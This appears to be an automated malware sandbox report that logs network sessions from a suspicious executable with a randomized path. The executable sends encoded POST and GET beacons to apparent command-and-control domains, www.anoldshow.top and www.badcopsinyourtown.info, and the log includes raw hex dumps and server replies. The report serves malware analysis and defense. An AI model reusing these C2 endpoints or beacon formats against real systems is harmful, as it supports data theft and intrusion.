                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  17192.168.2.649723203.161.43.228803152C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  TimestampBytes transferredDirectionData
                                  May 23, 2024 15:19:59.949567080 CEST745OUTPOST /ii3e/ HTTP/1.1
                                  Host: www.anoldshow.top
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 209
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.anoldshow.top
                                  Referer: http://www.anoldshow.top/ii3e/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Raw: 46 4e 50 64 3d 74 57 33 2f 6c 57 45 31 37 68 50 59 32 48 33 54 61 31 49 30 33 4f 4d 78 70 32 34 7a 76 77 57 48 39 66 6f 4b 71 68 4c 4d 38 39 42 54 68 37 6c 70 34 79 73 68 56 65 62 6c 70 4f 4e 62 5a 6b 62 4c 44 5a 6c 7a 2f 43 34 43 4d 68 78 78 4c 76 32 7a 30 73 37 45 50 39 61 6a 65 38 72 73 37 44 72 36 77 4c 6a 4d 74 49 6a 2f 6e 33 61 73 74 55 6b 36 32 6a 2f 50 62 30 35 31 31 69 41 63 64 79 4e 47 46 69 4f 4c 71 66 69 57 30 36 30 52 39 72 71 68 49 62 6f 70 4f 6e 37 6a 79 76 48 69 32 78 5a 79 49 4f 37 35 73 73 6a 2f 52 33 36 77 45 46 73 6b 56 2f 2b 2b 4a 33 4f 66 43 32 31 73 70 64 64 38 52 36 45 6c 75 57 65 69 4a 4b 4b 73
                                  Data Ascii: FNPd=tW3/lWE17hPY2H3Ta1I03OMxp24zvwWH9foKqhLM89BTh7lp4yshVeblpONbZkbLDZlz/C4CMhxxLv2z0s7EP9aje8rs7Dr6wLjMtIj/n3astUk62j/Pb0511iAcdyNGFiOLqfiW060R9rqhIbopOn7jyvHi2xZyIO75ssj/R36wEFskV/++J3OfC21spdd8R6EluWeiJKKs
                                  May 23, 2024 15:20:00.569691896 CEST658INHTTP/1.1 404 Not Found
                                  Date: Thu, 23 May 2024 13:20:00 GMT
                                  Server: Apache
                                  Content-Length: 514
                                  Connection: close
                                  Content-Type: text/html
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  18192.168.2.649724203.161.43.228803152C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  TimestampBytes transferredDirectionData
                                  May 23, 2024 15:20:02.477355003 CEST769OUTPOST /ii3e/ HTTP/1.1
                                  Host: www.anoldshow.top
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 233
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.anoldshow.top
                                  Referer: http://www.anoldshow.top/ii3e/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Raw: 46 4e 50 64 3d 74 57 33 2f 6c 57 45 31 37 68 50 59 30 6e 48 54 63 69 55 30 2f 4f 4d 32 6e 57 34 7a 6c 51 57 44 39 66 6b 4b 71 6b 7a 63 38 4a 74 54 68 66 68 70 37 33 41 68 59 2b 62 6c 6d 75 4d 54 48 55 62 63 44 5a 68 37 2f 47 34 43 4d 68 31 78 4c 74 75 7a 30 2b 54 48 4e 74 61 74 59 38 72 75 2f 44 72 36 77 4c 6a 4d 74 49 6d 55 6e 33 53 73 71 6c 55 36 32 48 72 4f 59 30 35 32 2f 43 41 63 4c 43 4e 43 46 69 4f 35 71 65 2f 4e 30 34 63 52 39 75 47 68 49 71 6f 75 45 6e 37 68 76 2f 48 32 78 55 6f 5a 4d 4e 57 5a 7a 66 44 53 4e 48 57 7a 4d 54 74 2b 4a 4d 2b 64 62 6e 75 64 43 30 74 65 70 39 64 57 54 36 38 6c 38 42 53 46 47 2b 76 50 35 71 43 68 61 79 72 53 49 42 30 46 6a 2f 65 51 31 5a 48 69 54 77 3d 3d
                                  Data Ascii: FNPd=tW3/lWE17hPY0nHTciU0/OM2nW4zlQWD9fkKqkzc8JtThfhp73AhY+blmuMTHUbcDZh7/G4CMh1xLtuz0+THNtatY8ru/Dr6wLjMtImUn3SsqlU62HrOY052/CAcLCNCFiO5qe/N04cR9uGhIqouEn7hv/H2xUoZMNWZzfDSNHWzMTt+JM+dbnudC0tep9dWT68l8BSFG+vP5qChayrSIB0Fj/eQ1ZHiTw==
                                  May 23, 2024 15:20:03.079688072 CEST658INHTTP/1.1 404 Not Found
                                  Date: Thu, 23 May 2024 13:20:02 GMT
                                  Server: Apache
                                  Content-Length: 514
                                  Connection: close
                                  Content-Type: text/html
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  19192.168.2.649725203.161.43.228803152C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  TimestampBytes transferredDirectionData
                                  May 23, 2024 15:20:05.948220015 CEST1782OUTPOST /ii3e/ HTTP/1.1
                                  Host: www.anoldshow.top
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 1245
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.anoldshow.top
                                  Referer: http://www.anoldshow.top/ii3e/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Raw: 46 4e 50 64 3d 74 57 33 2f 6c 57 45 31 37 68 50 59 30 6e 48 54 63 69 55 30 2f 4f 4d 32 6e 57 34 7a 6c 51 57 44 39 66 6b 4b 71 6b 7a 63 38 49 35 54 68 71 31 70 34 51 30 68 5a 2b 62 6c 76 4f 4d 53 48 55 62 64 44 5a 5a 42 2f 47 39 33 4d 6b 70 78 45 75 6d 7a 6a 2f 54 48 48 74 61 74 61 38 72 76 37 44 71 79 77 50 48 49 74 49 32 55 6e 33 53 73 71 6d 38 36 68 44 2f 4f 55 55 35 31 31 69 41 51 64 79 4d 66 46 69 57 70 71 65 37 64 31 49 38 52 7a 75 57 68 62 34 41 75 47 48 37 6e 73 2f 47 78 78 55 73 47 4d 4e 4b 6a 7a 65 6e 34 4e 45 4b 7a 64 56 38 2b 56 6f 6d 6e 44 42 79 71 63 58 5a 38 6b 62 68 79 63 62 56 62 31 41 69 7a 47 4d 72 7a 39 64 36 45 63 44 47 2f 4f 7a 55 32 68 4a 72 54 67 4a 61 63 43 44 42 66 7a 6f 30 58 74 74 79 39 66 75 70 71 64 68 6c 42 51 57 48 50 55 6e 74 32 61 4e 4a 55 70 6d 79 65 6c 74 2b 6f 6e 57 78 69 42 54 53 4c 6b 52 2b 6b 6f 78 2f 67 6d 4a 70 47 31 42 39 61 37 61 59 51 5a 41 56 65 50 4a 2b 4e 4a 56 50 6a 7a 36 6b 64 4a 6c 72 76 48 67 62 44 4c 6d 75 57 62 53 76 46 69 33 4b 65 46 74 57 58 46 [TRUNCATED]
                                  Data Ascii: FNPd=tW3/lWE17hPY0nHTciU0/OM2nW4zlQWD9fkKqkzc8I5Thq1p4Q0hZ+blvOMSHUbdDZZB/G93MkpxEumzj/THHtata8rv7DqywPHItI2Un3Ssqm86hD/OUU511iAQdyMfFiWpqe7d1I8RzuWhb4AuGH7ns/GxxUsGMNKjzen4NEKzdV8+VomnDByqcXZ8kbhycbVb1AizGMrz9d6EcDG/OzU2hJrTgJacCDBfzo0Xtty9fupqdhlBQWHPUnt2aNJUpmyelt+onWxiBTSLkR+kox/gmJpG1B9a7aYQZAVePJ+NJVPjz6kdJlrvHgbDLmuWbSvFi3KeFtWXFDM9F2MvOIZwdwDxpnGZyA89+2QcXD52RogzJXHRk8XO1jdV+oyr48nsqPR2BtUddMq63+cz8Lq26kWCXw3634vBGgR4iE8ppscQfeqdv3ve2Wp10v6ZjQk+/pvKzQ3aliSL5J9uJiiQr7pnqql27XTN+tFSZ/81tRvW+N+0wzbmFkl8cmUvQjmdBX5QtgDq6aKsr3rCs3jMoXR2q5lYtDYnSlTOGY1clEyp2/0D4KcDZZ99qMp4+9wLlHa+5Atwy2+d0bD5Ea5gr8sBr2i8KjYZuuGY+6Zr/5NpYCJ6KNHb1wQSBx3k+H90VHPrdfo9TFKiPRb9Ydc+UBIGZRakJecSa0hWznrsWUOpKIEH3t+B76oZWQoew8ZrZ3hxxAkDlgf0ZN855bGL+whnDQCmeyZyIpHKd+yz3IhRlLMvkL+ZkA/zmGhX6F901FurZtNKGnwjFKxM16pptlTL+S7DGh7g07TgJFifNThtGVvbQ6Qd9gEdcocDsOGBiclbYBpdSbEScXvF9iKldlncYzyE/V1hO/QEiMws19y798HAhYUdKSJYG4mzcCLWIBvTMhfpVOcRsOGwW7Yvqkpd84YyY7cIqfUUiiBHg5alKxl5BCYYNXhtz1jymvpnofkSusJtPlAFkMwrZLqrihUsPGwd/vqB6wBB2U0tC/0 [TRUNCATED]
                                  May 23, 2024 15:20:06.566871881 CEST658INHTTP/1.1 404 Not Found
                                  Date: Thu, 23 May 2024 13:20:06 GMT
                                  Server: Apache
                                  Content-Length: 514
                                  Connection: close
                                  Content-Type: text/html
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  20192.168.2.649726203.161.43.228803152C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  TimestampBytes transferredDirectionData
                                  May 23, 2024 15:20:08.950460911 CEST492OUTGET /ii3e/?FNPd=gUffmmgf+j+eonfXGycQzt8ao2VHtB63wMQRmDLG69g3nf5Br3Vvevf8g6YjJ3DFTJ0p8mRaN1UTMPOwjNToF+SwMNbt6WzMyov1r5SS6GyZoHVOyxmtZVBap1MoFQhjNwOQqL8=&zdK0d=M8mTZ0xHNd1dPVm HTTP/1.1
                                  Host: www.anoldshow.top
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  May 23, 2024 15:20:09.560302973 CEST673INHTTP/1.1 404 Not Found
                                  Date: Thu, 23 May 2024 13:20:09 GMT
                                  Server: Apache
                                  Content-Length: 514
                                  Connection: close
                                  Content-Type: text/html; charset=utf-8
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  21192.168.2.6497273.33.130.190803152C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  TimestampBytes transferredDirectionData
                                  May 23, 2024 15:20:14.696083069 CEST772OUTPOST /vucc/ HTTP/1.1
                                  Host: www.badcopsinyourtown.info
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 209
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.badcopsinyourtown.info
                                  Referer: http://www.badcopsinyourtown.info/vucc/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Raw: 46 4e 50 64 3d 68 72 68 73 42 56 31 69 79 38 4a 74 31 4b 73 43 33 53 31 76 45 62 46 72 6c 74 52 6e 76 30 6d 77 38 5a 72 41 34 38 72 41 2b 5a 78 45 70 6f 55 72 74 32 31 71 78 48 67 71 67 75 7a 32 49 39 74 64 62 74 5a 50 73 6b 4c 72 61 51 4d 35 57 64 6b 2b 35 56 77 51 66 51 35 41 6b 34 6e 41 68 42 42 6f 30 36 52 36 7a 43 73 71 44 7a 77 47 46 64 43 67 43 51 6b 4b 57 78 32 77 4b 77 52 4f 76 39 5a 69 52 32 6f 49 5a 73 4c 78 79 62 39 4f 74 6e 57 70 73 72 5a 36 35 67 44 39 68 66 35 63 33 78 55 4a 58 45 45 48 35 5a 54 56 53 65 53 76 64 37 35 32 4d 4a 58 4c 43 57 75 71 72 55 4a 2b 70 77 63 51 64 31 73 2b 71 74 59 44 70 42 55 4f
                                  Data Ascii: FNPd=hrhsBV1iy8Jt1KsC3S1vEbFrltRnv0mw8ZrA48rA+ZxEpoUrt21qxHgqguz2I9tdbtZPskLraQM5Wdk+5VwQfQ5Ak4nAhBBo06R6zCsqDzwGFdCgCQkKWx2wKwROv9ZiR2oIZsLxyb9OtnWpsrZ65gD9hf5c3xUJXEEH5ZTVSeSvd752MJXLCWuqrUJ+pwcQd1s+qtYDpBUO


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  22192.168.2.6497283.33.130.190803152C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  TimestampBytes transferredDirectionData
                                  May 23, 2024 15:20:17.233599901 CEST796OUTPOST /vucc/ HTTP/1.1
                                  Host: www.badcopsinyourtown.info
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 233
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.badcopsinyourtown.info
                                  Referer: http://www.badcopsinyourtown.info/vucc/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Raw: 46 4e 50 64 3d 68 72 68 73 42 56 31 69 79 38 4a 74 30 72 63 43 6b 46 4a 76 43 37 46 71 71 4e 52 6e 32 6b 6d 30 38 5a 33 41 34 35 4b 46 2b 74 64 45 71 4d 63 72 2f 6b 64 71 77 48 67 71 30 2b 79 79 4d 39 74 67 62 74 45 77 73 6b 48 72 61 52 6f 35 57 59 59 2b 35 69 74 47 66 41 35 43 77 49 6e 43 6c 42 42 6f 30 36 52 36 7a 43 70 42 44 31 59 47 46 4e 79 67 46 42 6b 4a 62 52 32 7a 64 41 52 4f 39 4e 5a 6d 52 32 6f 6d 5a 74 48 50 79 5a 46 4f 74 6e 47 70 74 36 5a 39 33 67 44 42 75 2f 34 70 37 41 68 48 53 46 42 49 78 5a 50 58 52 4a 71 48 59 4e 34 73 51 36 58 6f 51 47 4f 6f 72 57 52 4d 70 51 63 36 66 31 55 2b 34 36 55 6b 6d 31 78 74 48 74 2f 31 71 59 45 41 62 43 30 52 63 30 33 4b 54 44 77 62 32 67 3d 3d
                                  Data Ascii: FNPd=hrhsBV1iy8Jt0rcCkFJvC7FqqNRn2km08Z3A45KF+tdEqMcr/kdqwHgq0+yyM9tgbtEwskHraRo5WYY+5itGfA5CwInClBBo06R6zCpBD1YGFNygFBkJbR2zdARO9NZmR2omZtHPyZFOtnGpt6Z93gDBu/4p7AhHSFBIxZPXRJqHYN4sQ6XoQGOorWRMpQc6f1U+46Ukm1xtHt/1qYEAbC0Rc03KTDwb2g==


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  23192.168.2.6497293.33.130.190803152C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  TimestampBytes transferredDirectionData
                                  May 23, 2024 15:20:19.774887085 CEST1809OUTPOST /vucc/ HTTP/1.1
                                  Host: www.badcopsinyourtown.info
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 1245
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.badcopsinyourtown.info
                                  Referer: http://www.badcopsinyourtown.info/vucc/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Raw: 46 4e 50 64 3d 68 72 68 73 42 56 31 69 79 38 4a 74 30 72 63 43 6b 46 4a 76 43 37 46 71 71 4e 52 6e 32 6b 6d 30 38 5a 33 41 34 35 4b 46 2b 74 56 45 71 2b 45 72 74 54 42 71 7a 48 67 71 33 2b 79 78 4d 39 74 48 62 74 4d 30 73 6b 37 64 61 54 67 35 55 39 55 2b 6f 6d 5a 47 52 41 35 43 79 49 6e 44 68 42 42 35 30 36 42 2b 7a 42 42 42 44 31 59 47 46 4f 71 67 54 41 6b 4a 49 68 32 77 4b 77 51 50 76 39 5a 65 52 32 67 51 5a 74 44 66 78 71 4e 4f 73 44 61 70 75 49 42 39 2f 67 44 44 70 2f 34 78 37 41 39 4d 53 46 4e 69 78 61 53 79 52 4f 61 48 62 4a 42 61 4e 34 53 7a 45 48 53 4e 38 52 52 7a 79 47 73 6d 47 57 6b 6a 37 59 6b 73 6b 31 35 47 65 74 7a 31 2f 65 42 42 54 77 59 69 64 30 43 75 56 68 77 65 6b 64 46 4d 50 4d 31 32 72 58 4d 6f 2f 4b 63 45 75 72 57 6f 68 69 4a 71 48 72 31 33 45 34 51 6a 35 41 5a 32 63 59 50 76 70 57 32 6d 42 55 6d 69 58 42 39 63 50 4b 51 33 4a 48 71 33 6e 2b 4b 6c 6f 59 43 43 71 69 79 62 30 61 49 4f 72 69 45 74 70 36 4e 6d 68 64 4b 53 64 71 51 58 41 75 64 6d 54 47 4f 4b 70 6f 63 64 4e 43 78 50 55 [TRUNCATED]
                                  Data Ascii: 